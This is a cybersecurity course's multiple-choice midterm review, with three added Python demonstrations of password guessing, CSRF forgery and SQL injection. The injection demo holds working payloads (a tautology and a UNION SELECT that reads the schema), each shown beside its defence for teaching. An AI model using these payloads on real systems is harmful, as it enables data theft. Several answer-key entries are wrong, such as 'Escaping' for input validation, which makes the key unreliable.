CSCI 464 (Multiple Choice) Midterm Review
Each of the following is a characteristic of cybercrime except _____. a. targeted attacks against financial networks. b. unauthorized access to information c. theft of personal information d. exclusive use of worms and viruses
D. Exclusive use of worms & viruses
Which of the following should be carried out to address known software vulnerabilities of a specific application? Change the hardware Change the software Install a security patch Remove the application
Install a security patch
Each of the following is a state of a port that can be returned by a port scanner except a. open b. busy c. blocked d. closed
b. busy
Security audits help ensure that your rules and __________ are up to date, documented, and subject to change control procedures. recommendations configurations applications mitigation activities
configurations
____________ is the practice of hiding data and keeping it away from unauthorized users. cryptography encryption cybersecurity ciphertext
cryptography
Which of the following is the definition of netcat? An e-mail or instant-message spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. The mode in which sniffers operate; it is nonintrusive and does not generate network traffic. This means that every data packet is captured and can be seen by the sniffer. Software designed to infiltrate one or more target computers and follow an attacker's instructions. A network utility program that reads from and writes to network connections.
A network utility program that reads from and writes to network connections.
A set of changes done to any program or application with the aim of updating, fixing or improving it is often referred to as what? A hack A patch An install A fix
A patch
What is meant by firewall? A network utility program that reads from and writes to network connections. A program or dedicated hardware device that inspects network traffic passing through it and denies or permits that traffic based on a set of rules you determine at configuration. An e-mail or instant-message spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. A type of attack in which the attacker takes control of a session between two machines and masquerades as one of them.
A program or dedicated hardware device that inspects network traffic passing through it and denies or permits that traffic based on a set of rules you determine at configuration.
A port scan returns an 'open' response. What does this mean? A service is listening on the port Connections to the port will be denied There was no reply from the host
A service is listening on the port
Which term describes the layer of software that resides between the virtual operating system and the physical hardware it runs on in a virtualization environment? A) Hypervisor B) Virtual machine C) Workload management D) Virtual hard disk
A) Hypervisor
If a program allocates a space in RAM for an input and then attempts to read in an input that is too large for that space, what might occur? A. buffer overflow B. SQL injection C. trapped exception D. none of the above
A. Buffer overflow
Which one of the following is an example of a disclosure threat? A. Espionage B. Alteration C. Denial D. Destruction
A. Espionage
Mark is considering outsourcing security functions to a third-party service provider. What benefit is he most likely to achieve? Reduced operating costs Access to a high level of expertise Developing in-house talent Building internal knowledge
Access to a high level of expertise
Ed wants to make sure that his system is designed in a manner that allows tracing actions to an individual. Which phase of access control is Ed concerned about? Identification Authentication Authorization Accountability
Accountability
Carrying out a multi-phase, long-term, stealthy and advanced operation against a specific target is often referred to as what? Advanced persistent threat Network sniffing Social engineering Script kiddies Rainbow tables
Advanced persistent threat
The first thing to do when performing a security assessment for a client is: Scan the network to identify potentially vulnerable systems and ports Discover services running on their network Agree on a scope and objective for the security assessment Collect evidence of vulnerabilities
Agree on a scope and objective for the security assessment
Which of the following are challenges that the IoT industry must overcome? security and privacy interoperability and standards legal and regulatory compliance e-commerce and economic development All of the above
All of the above
Select the BEST answer to improve virtualization security: Pay attention to trust boundaries. Use the right virtualization technology for the application. Employ Mandatory Access Control (MAC). All of the above.
All of the above.
What is the best method to prevent Bluetooth from being exploited? Always disable Bluetooth when it is not being used Always use a VPN when connecting with Bluetooth Only use Bluetooth to connect to another smartphone or tablet Only use Bluetooth when connecting to a known SSID
Always disable Bluetooth when it is not being used
Which of the following examples illustrates how malware might be concealed? A botnet of zombies carry personal information back to the hacker A hacker uses techniques to improve the ranking of a website so that users are redirected to a malicious site An attack is launched against the public website of an online retailer with the objective of blocking its response to visitors An email is sent to the employees of an organization with an attachment that looks like an antivirus update, but the attachment actually consists of spyware
An email is sent to the employees of an organization with an attachment that looks like an antivirus update, but the attachment actually consists of spyware
What is the last stage of a pen test? Scanning Analysis and reporting Gathering target information Maintaining access
Analysis and reporting
Which action is the best step to protect Internet of Things (IoT) devices from becoming the entry point for security vulnerabilities into a network while still meeting business requirements? Applying security updates promptly Using encryption for communications Removing IoT devices from the network Turning IoT devices off when not in use
Applying security updates promptly
What are examples of multi-factor authentication? Authentication that requires factoring large numbers together Authentication based on something you know, something you have and something you are Authentication that considers multiple factors of the system before allowing access Authentication that asks the user to factor multiple numbers
Authentication based on something you know, something you have and something you are
Janet is identifying the set of privileges that should be assigned to a new employee in her organization. Which phase of the access control process is she performing? Identification Authentication Accountability Authorization
Authorization
Rachel is investigating an information security incident that took place at the high school where she works. She suspects that students may have broken into the student records system and altered their grades. If correct, which one of the tenets of information security did this attack violate? A. Confidentiality B. Integrity C. Availability D. Nonrepudiation
B
Which security model protects the confidentiality of information? A. BIBA B. Bell-LaPadula C. Brewer and Nash D. Clark-Wilson
B. Bell-LaPadula
The use of computing data or services being lost temporarily or permanently, without damage to the physical hardware, is called a ________? A. Ransomware attack B. Denial of service C. Forgery D. Worm
B. Denial of Service
What amendment protects an individual from unreasonable searches and seizures in terms of their devices? A. First B. Fourth C. Eighth D. Tenth
B. Fourth
A business has the following SC: {(Confidentiality, High), (Integrity, Low), (Availability, Low)}. Based on this information, which attack would have the largest impact on a business? A. subversion B. disclosure C. denial of service D. any of the above
B. disclosure
Which of the following are examples of cracking an encrypted password? (Choose four correct answers) Intimidation Brute force attack Network sniffing Rainbow tables Social engineering Spraying Dictionary attack
Brute force attack Rainbow tables Spraying Dictionary attack
Which type of password attack attempts all possible combinations of a password in an attempt to guess the correct value? Dictionary attack Rainbow table attack Social engineering attack Brute-force attack
Brute-force attack
What vulnerability occurs when data is written beyond the memory areas allocated to an application? Buffer overflow Access control problems Race conditions Weaknesses in security practices Non-validated input
Buffer overflow
Which attack strategy is Turing complete? A. return to libc B. borrowed code chunks C. return-oriented programming D. A and B
C
Which of the following frameworks identifies controls based on the latest information about common cyber attacks and provides benchmarks for various platforms? CSA The National Cybersecurity Workforce CIS ISO
CIS
You are configuring access settings to require employees in your organization to authenticate first before accessing certain web pages. Which requirement of information security is addressed through this configuration? Scalability Availability Integrity Confidentiality
Confidentiality
A port scan returns a 'closed' response. What does this mean? There was no reply from the host A service is listening on the port Connections to the port will be denied
Connections to the port will be denied
What encryption algorithm is partially homomorphic by accident? A. ECDSA B. Diffie-Hellman C. RSA
C. RSA
During which phase of the access control process does the system answer the question, "What can the requestor access?" Identification Authentication Authorization Accountability
Authorization
An organization is experiencing overwhelming visits to a main web server. You are developing a plan to add a couple of more web servers for load balancing and redundancy. Which requirement of information security is addressed by implementing the plan? Scalability Integrity Confidentiality Availability
Availability
Which one of the following is not a good technique for performing authentication of an end user? A. Password B. Biometric scan C. Identification number D. Token
C. Identification number
Betty receives a cipher text message from her colleague Tim. What type of function does Betty need to use to read the plaintext message? Encryption Hashing Decryption Validation
Decryption
What can the skills developed by cybersecurity professionals be used for? Cybersecurity professionals develop many skills that can only be used for good Cybersecurity professionals develop many skills that can only be used for evil Cybersecurity professionals develop many skills that cannot be used for evil Cybersecurity professionals develop many skills that can be used for good or evil
Cybersecurity professionals develop many skills that can be used for good or evil
What is the difference between a hacker and a cybersecurity professional? Hackers only operate within legal boundaries Cybersecurity professionals must work within legal boundaries Hackers have special skills that cybersecurity professionals do not Cybersecurity professionals must not have the same skills as hackers
Cybersecurity professionals must work within legal boundaries
Which of the following statements describes cyberwarfare? Cyberwarfare is an attack carried out by a group of script kiddies Cyberwarfare is simulation software for Air Force pilots that allows them to practice under a simulated war scenario Cyberwarfare is a series of personal protective equipment developed for soldiers involved in nuclear war Cyberwarfare is an Internet-based conflict that involves the penetration of information systems of other nations
Cyberwarfare is an Internet-based conflict that involves the penetration of information systems of other nations
What are the two objectives of ensuring data integrity? (Choose two) Data is available all the time Data is unaltered during transit Access to data is authenticated Data is not changed by unauthorized entities Data is encrypted while in transit and when stored on disks
Data is unaltered during transit Data is not changed by unauthorized entities
Which of the following defines network mapping? A method of security testing that isn't based directly on knowledge of a program's architecture. The standard by which your computer or device is compared to determine if it is securely configured. Using tools to determine the layout and services running on an organization's systems and networks. A process of finding the weaknesses in a system and determining which places may be attack points.
Using tools to determine the layout and services running on an organization's systems and networks.
You have been asked to perform an analysis of the current state of an organization's network. What would you use to scan the network only for security risks? Vulnerability scanner Packet analyzer Pen test Malware
Vulnerability scanner
Each of the following is an action that a virus can take except _____ a. transport itself through the network to another device b. cause a computer to crash c. erase files from a hard drive d. make multiple copies of itself and consume all of the free space in a hard drive
a. transport itself through the network to another device
An example of a(n) _____ is a software defect in an operating system that allows an unauthorized user to gain access to a computer without a password. a. vulnerability b. threat c. threat agent d. asset exploit (AE)
a. vulnerability
Mallory (an attacker) forced Alice to log into her Google account. Her goal was to obtain information about Alice's search history. What kind of vulnerability did Mallory most likely exploit to launch the attack? a.) CSRF b.) Phishing c.) SQL Injection d.) XSS
a.) CSRF
A web programmer wants to create a site that is capable of dynamically generating variables based on user input. Which language should the programmer use to help generate that dynamic data? a.) PHP b.) LMTH c.) HTML d.) PGP
a.) PHP
When the code that the attacker injects into a website remains on the website for a period of time and is visible to other users, it is called what type of attack? a.) Stored XSS b.) SQL Injection c.) Reflected XSS d.) Half-persistent XSS
a.) Stored XSS
What term is used to describe associating actions with users for later reporting and research? event-based synchronization system ownership accountability constrained user interface
accountability
Which option is an important characteristic or capability of advanced malware? distributed, fault-tolerant architecture multi-functionality hiding techniques such as polymorphism, metamorphism, and obfuscation all of the above
all of the above
What are two methods that ensure confidentiality? (Choose two.) authorization availability nonrepudiation authentication integrity encryption
authentication encryption
A company is experiencing overwhelming visits to a main web server. The IT department is developing a plan to add a couple more web servers for load balancing and redundancy. Which requirement of information security is addressed by implementing the plan? integrity scalability availability confidentiality
availability
The protocol File Transfer Protocol (FTP) uses which two ports? a. 19 and 20 b. 20 and 21 c. 21 and 22 d. 22 and 23
b. 20 and 21
Each of the following is a goal of information security except _____. a. prevent data b. decrease user productivity c. avoid legal consequences d. foil cyberterrorism
b. decrease user productivity
After an attacker has probed a computer or network for information, she would next _____. a. modify security settings b. penetrate any defenses c. paralyze networks and devices d. circulate to other systems
b. penetrate any defenses
Attackers use buffer overflows to ____ a. corrupt the kernel so the computer cannot reboot b. point to another area in data memory that contains the attacker's malware code c. place a virus into the kernel d. erase buffer overflow signature files
b. point to another area in data memory that contains the attacker's malware code
Which statement best describes the principle of least privilege? a. Only allow the minimum number of defined users to access a system. b. An object should allow only data owners to access it. c. A subject should be granted only the permissions to accomplish a task and nothing more. d. An object should grant access only to subjects through one model and nothing more.
c. A subject should be granted only the permissions to accomplish a task and nothing more.
Access and activity monitoring supports what security principle? a. Availability b. Least privilege c. Accountability d. Liability
c. Accountability
What are three methods that can be used to ensure confidentiality of information? (Choose three.) data encryption backup file permission settings username ID and password two-factor authentication version control
data encryption username ID and password two-factor authentication
What are three states of data during which data is vulnerable? (Choose three.) data in-process stored data data in-transit data encrypted purged data data decrypted
data in-process stored data data in-transit
For what purpose would a network administrator use the Nmap tool? detection and identification of open ports protection of the private IP addresses of internal hosts identification of specific network anomalies collection and analysis of security alerts and logs
detection and identification of open ports
What is the motivation of a white hat attacker? discovering weaknesses of networks and systems to improve the security level of these systems studying operating systems of various platforms to develop a new system taking advantage of any vulnerability for illegal personal gain fine tuning network devices to improve their performance and efficiency
discovering weaknesses of networks and systems to improve the security level of these systems
For all the technical solutions you can devise to secure your systems, the __________ remains your greatest challenge. human element administration certifier regulations
human element
Which of the following is not a type of authentication? ownership characteristics identification knowledge
identification
The world needs people who understand computer-systems ________ and who can protect computers and networks from criminals and terrorists. applications integrity connectivity security
security
What fills security gaps and software weaknesses? cryptography testing and quality assurance data classification standard cybersecurity
testing and quality assurance
Users report that the network access is slow. After questioning the employees, the network administrator learned that one employee downloaded a third-party scanning program for the printer. What type of malware might be introduced that causes slow performance of the network? virus worm spam phishing
worm
What malware exploited IoT security weaknesses to deliver a record-setting DDoS attack? Mirai Stuxnet Wannacry Fuzzykittens
Mirai
Which mitigation plan is most appropriate to limit the risk of unauthorized access to workstations? Password protection Antivirus software Deactivating USB ports Vulnerability scanning
Password protection
A medical office employee sends emails to patients about their recent visits to the facility. What information would put the privacy of the patients at risk if it was included in the email? Contact information Next appointment Patient records First and last name
Patient records
Developers want to log Security-Enhanced Linux (SELinux) access violations without triggering access errors. What SELinux mode of operation should they use? Disabled Permissive Enforcing Targeted
Permissive
What is the only way of ensuring that deleted files on your computer are irrecoverable? Emptying your computer's recycle bin Physically destroying your computer's hard drive Using a software program such as SDelete or Secure Empty Trash
Physically destroying your computer's hard drive
What is the best approach to prevent a compromised IoT device from maliciously accessing data and devices on a local network? Install a software firewall on every network device. Place all IoT devices that have access to the Internet on an isolated network. Disconnect all IoT devices from the Internet. Set the security settings of workstation web browsers to a higher level.
Place all IoT devices that have access to the Internet on an isolated network.
Which of the following are categories of security measures or controls? (Choose three correct answers) Firewalls Guards Camera Policy and procedure Technology Awareness, training and education
Policy and procedure Technology Awareness, training and education
In networking, what name is given to the identifier at both ends of a transmission to ensure that the right data is passed to the correct application? IP address Port number MAC address Sequence number
Port number
What is typically the first phase of a cyber attack? Reconnaissance Delivery Command and Control Exploitation
Reconnaissance
Select the secure alternative to the telnet protocol: HTTP STLS IPsec SSH
SSH
A company is attempting to lower the cost in deploying commercial software and is considering a cloud based service. Which cloud based service would be best to host the software? PaaS RaaS SaaS IaaS
SaaS
Which law was enacted to prevent corporate accounting-related crimes? The Federal Information Security Management Act Gramm-Leach-Bliley Act Import/Export Encryption Act Sarbanes-Oxley Act
Sarbanes-Oxley Act
You are having difficulty remembering passwords for all of your online accounts. What should you do? Write the passwords down and keep them out of sight Share the passwords with a network administrator or computer technician Save the passwords in a centralized password manager program Create a single strong password to be used across all online accounts
Save the passwords in a centralized password manager program
Which of the following is not a tenet of Information Systems Security? Confidentiality Integrity Security Availability
Security
What is the main function of the Cisco Security Incident Response Team? To design next generation routers and switches that are less prone to cyber attacks To design polymorphic malware To ensure company, system and data preservation To provide standards for new encryption techniques
To ensure company, system and data preservation
A port scan returns a 'dropped' response. What does this mean? A service is listening on the port Connections to the port will be denied There was no reply from the host
There was no reply from the host
Why should a software developer "Think like a hacker"? They build systems anticipating ways their code will be hacked They can insert back doors and quickly bypass authentication to improve testing They build software that incorporates malware They build software that cannot be hacked
They build systems anticipating ways their code will be hacked
Which term describes any action that could damage an asset? Risk Countermeasure Vulnerability Threat
Threat
Stuxnet malware was designed for which primary purpose? To hijack and take control of targeted computers To cause physical damage to equipment controlled by computers To cause serious harm to workers in a nuclear enrichment plant
To cause physical damage to equipment controlled by computers
What is the purpose of a backdoor? To enable software vendors to update software For government access To gain unauthorized access to a system without normal authentication procedures To allow developers to debug software
To gain unauthorized access to a system without normal authentication procedures
What is the main aim of a Cyber Security Incident Response Team (CSIRT)? To help client organizations improve their incident management capabilities To help ensure organization, system and data preservation by performing investigations into computer security incidents To enforce access to network resources by creating role-based control policies To provide guidance on the implementation of safeguards and personnel training
To help ensure organization, system and data preservation by performing investigations into computer security incidents
During what phase of the ML/AI model lifecycle does data poisoning occur? Testing phase Training phase Inference phase Deployment phase
Training phase
Breanne's system was infected by malicious code after she installed an innocent-looking solitaire game that she downloaded from the Internet. What type of malware did she likely encounter? Virus Worm Trojan horse Logic bomb
Trojan horse
An employee is at a restaurant with friends and tells them about an exciting new video game that is under development at the organization they work for. Is this employee's behavior ethical or unethical? Ethical Unethical
Unethical
An employee is laid off after fifteen years with the same organization. The employee is then hired by another organization within a week. In the new organization, the employee shares documents and ideas for products that the employee proposed at the original organization. Is the employee's behavior ethical or unethical? Ethical Unethical
Unethical
One of your colleagues has lost her identification badge. She is in a hurry to get to a meeting and does not have time to visit Human Resources to get a temporary badge. You lend her your identification badge until she can obtain a replacement. Is this behavior ethical or unethical? Ethical Unethical
Unethical
Which one of the following is NOT a commonly accepted best practice for password security? Use at least six alphanumeric characters. Do not include usernames in passwords. Include a special character in passwords. Include a mixture of uppercase characters, lowercase characters, and numbers in passwords.
Use at least six alphanumeric characters.
Which of the following is a requirement of a strong password? Use special characters such as ! @ or $ Use at least six characters Use a dictionary word or a common statement that you'll remember
Use special characters such as ! @ or $
If you receive an email containing a link or attachment, you should (pick the best answer): Click on it or download the attachment to see what it does Verify the email authenticity through other channels (e.g., website, phone) Forward the email to another friend to see if they got it, too Forward the email to all your friends to see what they think
Verify the email authenticity through other channels (e.g., website, phone)
If developers attempt to create their own security algorithms, it will likely introduce what type of vulnerabilities? Buffer overflow Race conditions Weaknesses in security practices Non-validated input Access control problems
Weaknesses in security practices
Yuri is a skilled computer security expert who attempts to break into the systems belonging to his clients. He has permission from the clients to perform this testing as part of a paid contract. What type of person is Yuri? Cracker White-hat hacker Black-hat hacker Grey-hat hacker
White-hat hacker
What tool might be used by an attacker during the reconnaissance phase of an attack to glean information about domain registrations? Whois Simple Network Management Protocol (SNMP) Ping Domain Name System (DNS)
Whois
Which of the following is an example of two factor authentication? Your answer to a general knowledge question and your password Your password and your username Your fingerprint and your password Your account number and your name
Your fingerprint and your password
Which technology removes direct equipment and maintenance costs from the user for data backups? a cloud service network attached storage a tape an external hard drive
a cloud service
What is an example of a Cyber Kill Chain? a group of botnets a planned process of cyberattack a series of worms based on the same core code a combination of virus, worm, and Trojan Horse
a planned process of cyberattack
What is a session token? a. A random string assigned by a Web server b. The same as a third-party cookie c. A unique identifier that includes the user's e-mail address d. XML code used in an XML injection attack
a. A random string assigned by a Web server
What is the best definition for the term authentication? a. A subject presents credentials to claim an identity. b. The access control system looks up permissions assigned to a subject. c. The access control system searches a user database to see if the subject exists. d. A subject provides additional information that should match information the access control system stores for that subject.
a. A subject presents credentials to claim an identity.
Which of the following cookies only lasts for the duration of visiting the Web site? a. Session b. Persistent c. Temporary d. RAM
a. Session
Which of the following is true regarding vulnerability appraisal? a. Vulnerability appraisal is always the easiest and quickest step. b. Every asset must be viewed in light of each threat. c. Each threat could reveal multiple vulnerabilities. d. Each vulnerability should be cataloged.
a. Vulnerability appraisal is always the easiest and quickest step.
Each of the following is a step in risk management except ____ a. attack assessment b. vulnerability appraisal c. threat evaluation d. risk mitigation
a. attack assessment
Utility, telecommunications, and financial services companies are considered prime targets of _____ because attackers can significantly disrupt business and personal activities by destroying a few targets. a. cyberterrorists b. kiddie scripters c. computer spies d. blue hat hackers (BHH)
a. cyberterrorists
The term ____ is commonly used in a generic sense to identify anyone who illegally breaks into a computer system. a. hacker b. cyberterrorist c. Internet Exploiter d. cyberrogue
a. hacker
A cross-site request forgery (XSRF) ____ a. is used to inherit the identity and privileges of the victim b. is identical to cross-site scripting (XSS) c. cannot be blocked d. can only be used with a Web-based e-mail client
a. is used to inherit the identity and privileges of the victim
The basis of a SQL injection attack is _____ a. to inject SQL statements through unfiltered user input b. to have the SQL server attack client Web browsers c. to link SQL servers into a botnet d. to expose SQL code so that it can be examined
a. to inject SQL statements through unfiltered user input
Which access control models primarily support data integrity? (Choose all that apply.) a. Bell-LaPadula b. Biba c. State machine
b. Biba
When an attacker can access files in directories other than the root directory, this is known as a(n) _____ attack. a. Command injection b. Directory traversal c. SQL injection d. XML injection
b. Directory traversal
Which of the following types of attacks is not normally considered a malicious code object? a. Virus b. DoS c. Worm d. Trojan horse
b. DoS
If someone has made a transaction with a company and later denies having done so, the company needs to protect itself from such a situation. Which security concept does this refer to? a. Availability b. Nonrepudiation c. Access control d. Authentication
b. Nonrepudiation
The most important step in the sense of security is being able to ________ a security threat concern. a. Evade b. Recognize c. Challenge d. Log
b. Recognize
You're a security consultant who must find the method an attacker used to breach an organization. Upon investigation, you notice that one of their input forms on a web page is not sanitizing the input data before running the command against the back-end database. What is the most likely attack vector used during the breach? a.) Web-Form Injection b.) SQL Injection c.) CSRF d.) XSS
b.) SQL Injection
A janitor cleaning the floor of an organization's data center accidentally tripped over a power cord and cut the power to a critical file server. Users who depend on that data to complete their job functions are unable to access it and must take time off from work until IT personnel arrive and restore power to the computer. What security principle is most involved in this incident? a. Confidentiality b. Integrity c. Denial d. Alteration
c. Denial
Which type of attack uses a list of common passwords? a. Brute force attack b. Spoofing attack c. Dictionary attack d. Smurf attack
c. Dictionary attack
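As an added example (not part of the review), a dictionary attack against a salted SHA-256 password hash beside an exhaustive brute-force search, to show why a password that appears on a common-password list falls in a handful of guesses while a long mixed-character one does not. The wordlist, salt, candidate passwords and the `hash_password` scheme are constructed for illustration and stand in for whatever the target system actually stores.

```python
# Added example: dictionary attack versus brute force against a salted hash.
# Wordlist, salt and passwords are constructed; the hash scheme is a stand-in.
import hashlib
import itertools
import string
from typing import Iterable, Optional, Tuple

WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome", "dragon", "monkey"]
SALT = bytes.fromhex("9f1c4ab207e35d66")   # constructed per-user salt


def hash_password(password: str, salt: bytes) -> str:
    """Salted SHA-256 hex digest (fast hash, which is what makes guessing cheap)."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def dictionary_attack(target: str, salt: bytes, words: Iterable[str]) -> Tuple[Optional[str], int]:
    """Try each listed password in order; return (password, guesses) or (None, guesses)."""
    guesses = 0
    for word in words:
        guesses += 1
        if hash_password(word, salt) == target:
            return word, guesses
    return None, guesses


def brute_force(target: str, salt: bytes, alphabet: str, max_len: int) -> Tuple[Optional[str], int]:
    """Enumerate every string over `alphabet` up to max_len characters.
    The keyspace grows as len(alphabet)**length, so this is only feasible for tiny inputs."""
    guesses = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            guesses += 1
            candidate = "".join(combo)
            if hash_password(candidate, salt) == target:
                return candidate, guesses
    return None, guesses


if __name__ == "__main__":
    weak = hash_password("letmein", SALT)
    strong = hash_password("mk$$cittykat104#", SALT)
    print("dictionary vs weak   :", dictionary_attack(weak, SALT, WORDLIST))
    print("dictionary vs strong :", dictionary_attack(strong, SALT, WORDLIST))
    print("brute force, 3 lower :", brute_force(hash_password("zzz", SALT), SALT, string.ascii_lowercase, 3))
```

The dictionary finds `letmein` on the fourth guess and never finds the long mixed-character password; brute-forcing even three lowercase letters already costs 18,278 hashes, and the count multiplies by the alphabet size for every extra character. A slow, memory-hard password hash (bcrypt, scrypt, Argon2) raises the cost of each guess; it does not change which passwords are guessable.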
Which is the preferred means of trapping user input for errors? a. Input validation b. On-Trap input c. Escaping d. Fuzz testing
c. Escaping
Matthew's manager Renee recently informed him that she was concerned about the possibility of a hacker tapping into their corporate database and altering customer records. What security goal is Renee concerned about achieving? a. Confidentiality b. Alteration c. Integrity d. Availability
c. Integrity
Which part of a well-designed cryptographic system is responsible for maintaining the secrecy of communications? a. Identity of sender b. Algorithm c. Key d. Time of use
c. Key
Which of the following is the most secure protocol for transferring files? a. SCP b. FTPS c. SFTP d. FTP
c. SFTP
Which one of the following security principles explains a practice that security administrators should NOT follow when designing an information security program for their organization? a. Defense in depth b. Least privilege c. Security through obscurity d. Separation of privileges
c. Security through obscurity
A ____ requires a user to transport it from one computer to another. a. worm b. rootkit c. virus d. Trojan
c. Virus
What is unique about a cross-site scripting (XSS) attack compared to other injection attacks? a. SQL code is used in an XSS attack. b. XSS requires the use of a browser. c. XSS does not attack the Web application server to steal or corrupt its information. d. XSS attacks are rarely used anymore compared to other injection attacks.
c. XSS does not attack the Web application server to steal or corrupt its information.
Each of the following is a reason why it is difficult to defend against today's attackers except _____. a. speed of attacks b. greater sophistication of attacks c. complexity of attack tools d. delays in patching hardware and software products
c. complexity of attack tools
An example of _____ would be not revealing the type of computer, operating system, software, and network connection a computer uses. a. diversity b. limiting c. obscurity d. layering
c. obscurity
The failure of a security administrator to apply the most recent security patches to a system is an example of ________________. a. threat b. risk c. vulnerability d. malicious code e. denial of service
c. vulnerability
A ____ is a systematic and methodical evaluation of the exposure of assets to attackers, forces of nature, or any other entity that is a potential harm. a. penetration test b. vulnerability scan c. vulnerability assessment d. risk appraisal (RAP)
c. vulnerability assessment
A security professional is concerned about the company's web browsers running a script from a vulnerable site and a malicious script from a malicious site. What type of attack is the security professional concerned about? a.) Injection b.) XSS c.) CSRF d.) HTTPS
c.) CSRF
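As an added example (not part of the review) serving both the XSRF question above ("inherits the identity and privileges of the victim") and this one: a state-changing handler that trusts the session cookie alone, and the same handler hardened with a per-session token. The session store, the request dictionaries and the handler names are constructed for illustration and are not taken from any real framework.

```python
# Added example: why a cookie-only check is forgeable cross-site, and how a
# synchronizer token fixes it. Sessions, requests and names are constructed.
import secrets

# Server-side session store: the victim "alice" is currently logged in.
SESSIONS = {
    "sess-alice": {"user": "alice", "csrf_token": secrets.token_hex(16)},
}


def _session_for(request: dict):
    return SESSIONS.get(request["cookies"].get("session"))


def transfer_vulnerable(request: dict) -> str:
    """Trusts the session cookie alone. The browser attaches that cookie to every
    request for this origin, including a form auto-submitted by a malicious page,
    so the forged request runs with alice's identity and privileges."""
    session = _session_for(request)
    if session is None:
        return "401 not authenticated"
    form = request["form"]
    return f"200 {session['user']} sent {form['amount']} to {form['to']}"


def transfer_hardened(request: dict) -> str:
    """Also requires the per-session CSRF token, which the attacker's page cannot
    read thanks to the same-origin policy. compare_digest keeps the comparison
    constant-time so the token cannot be guessed byte by byte."""
    session = _session_for(request)
    if session is None:
        return "401 not authenticated"
    supplied = request["form"].get("csrf_token", "")
    if not secrets.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return "403 csrf token missing or invalid"
    form = request["form"]
    return f"200 {session['user']} sent {form['amount']} to {form['to']}"


def forged_request() -> dict:
    """What arrives when alice visits the malicious site while logged in: her
    browser adds the cookie, but the attacker cannot fill in her token."""
    return {"cookies": {"session": "sess-alice"},
            "form": {"amount": "1000", "to": "attacker"}}


def legitimate_request() -> dict:
    """A form rendered by the real site embeds the token as a hidden field."""
    return {"cookies": {"session": "sess-alice"},
            "form": {"amount": "25", "to": "bob",
                     "csrf_token": SESSIONS["sess-alice"]["csrf_token"]}}


if __name__ == "__main__":
    print("vulnerable, forged    :", transfer_vulnerable(forged_request()))
    print("hardened,   forged    :", transfer_hardened(forged_request()))
    print("hardened,   legitimate:", transfer_hardened(legitimate_request()))
```

The token is the classic fix; `SameSite` cookie attributes and checking the `Origin` header are complementary controls, not replacements for each other. Note also that an XSS bug on the same origin lets the attacker read the token, which is why the two attack classes are usually discussed together.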
Bob is developing a dynamic web application that depends on a database backend. What type of attack could a malicious individual use to send commands through his web application to the database? a.) Non Persistent XSS b.) Click Jacking c.) SQL Injection d.) Persistent XSS
c.) SQL Injection
Bob recently viewed an auction listing on a website. The item he wants is too expensive, so he decides to use an attack to lower the price of the item. What type of attack should Bob use? a.) Command Injection b.) Cross Site Request Forgery c.) SQL Injection d.) Cross Site Scripting (XSS)
c.) SQL Injection
A web server administrator is configuring access settings to require users to authenticate first before accessing certain web pages. Which requirement of information security is addressed through the configuration? integrity scalability availability confidentiality
confidentiality
Larry recently viewed an auction listing on a website. As a result, his computer executed code that popped up a window that asked for his password. What type of attack has Larry likely encountered? Select one: a. SQL injection b. Command injection c. XML injection d. Cross-site scripting (XSS)
d. Cross-site scripting (XSS)
_____ requires banks and financial institutions to alert customers of their policies and practices in disclosing customer information and to protect all electronic and paper records containing personally identifiable financial information. a. California Savings & Loan Security Act (CS&LSA) b. USA Patriot Act c. Sarbanes-Oxley Act (Sarbox) d. Gramm-Leach-Bliley Act (GLBA)
d. Gramm-Leach-Bliley Act (GLBA)
Which of the following cannot be performed through a successful SQL injection attack? a. Display a list of customer telephone numbers b. Discover the names of different fields in a table c. Erase a database table d. Reformat the Web application server's hard drive
d. Reformat the Web application server's hard drive.
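As an added example (not part of the review) covering the SQL injection questions above: the same customer lookup written with string concatenation and with a bound parameter, exercised with two constructed attacker inputs that produce options a and b from the question (dumping every customer's phone number, and reading the table's field names). The table, rows and column names are constructed; SQLite is used so it runs without a server.

```python
# Added example: injectable versus parameterized lookup. Schema and rows are constructed.
import sqlite3


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, phone TEXT, pw TEXT)")
    conn.executemany(
        "INSERT INTO customers (name, phone, pw) VALUES (?, ?, ?)",
        [("alice", "555-0100", "s3cret"), ("bob", "555-0101", "hunter2"), ("carol", "555-0102", "p4ss")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str):
    """Unfiltered input is pasted into the statement text, so the input can change
    the statement's structure rather than only the value being compared."""
    sql = f"SELECT name, phone FROM customers WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, name: str):
    """The value travels separately from the SQL text; whatever it contains, it is
    only ever compared against the name column."""
    return conn.execute("SELECT name, phone FROM customers WHERE name = ?", (name,)).fetchall()


# Constructed attacker inputs.
DUMP_ALL = "' OR '1'='1"                                        # tautology: every row matches
FIELD_NAMES = "x' UNION SELECT name, sql FROM sqlite_master--"   # append the table definition

if __name__ == "__main__":
    conn = setup_db()
    print("honest, param     :", lookup_parameterized(conn, "bob"))
    print("tautology, vuln   :", lookup_vulnerable(conn, DUMP_ALL))
    print("tautology, param  :", lookup_parameterized(conn, DUMP_ALL))
    print("schema read, vuln :", lookup_vulnerable(conn, FIELD_NAMES))
    print("schema read, param:", lookup_parameterized(conn, FIELD_NAMES))
```

Option c (dropping a table) needs a stacked statement such as `'; DROP TABLE customers;--`; Python's `sqlite3.execute()` refuses to run more than one statement per call, but many other drivers do not, so whether it works is a property of the driver, not of the injection. None of this reaches the host's disk layout, which is why option d is the one thing injection cannot do.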
____ constructs scenarios of the types of threats that assets can face in order to learn who the attackers are, why they attack, and what types of attacks may occur. a. Vulnerability prototyping b. Risk assessment c. Attack assessment d. Threat modeling
d. Threat modeling
A ______ attack exploits previously unknown vulnerabilities. a. virus resource b. shock and awe c. surprise d. zero day
d. zero day
Which of the following is a proper defense against an XSS attack? a.) Checking that inputs are in the expected form b.) Escaping dynamic data before inserting it into HTML c.) Sanitizing data before sending it to the database d.) All of these are defense mechanisms against XSS
d.) All of these are defense mechanisms against XSS
What type of attack uses forged web pages created to fraudulently acquire sensitive information? a.) SQL Injection b.) XSS c.) CSRF d.) Phishing
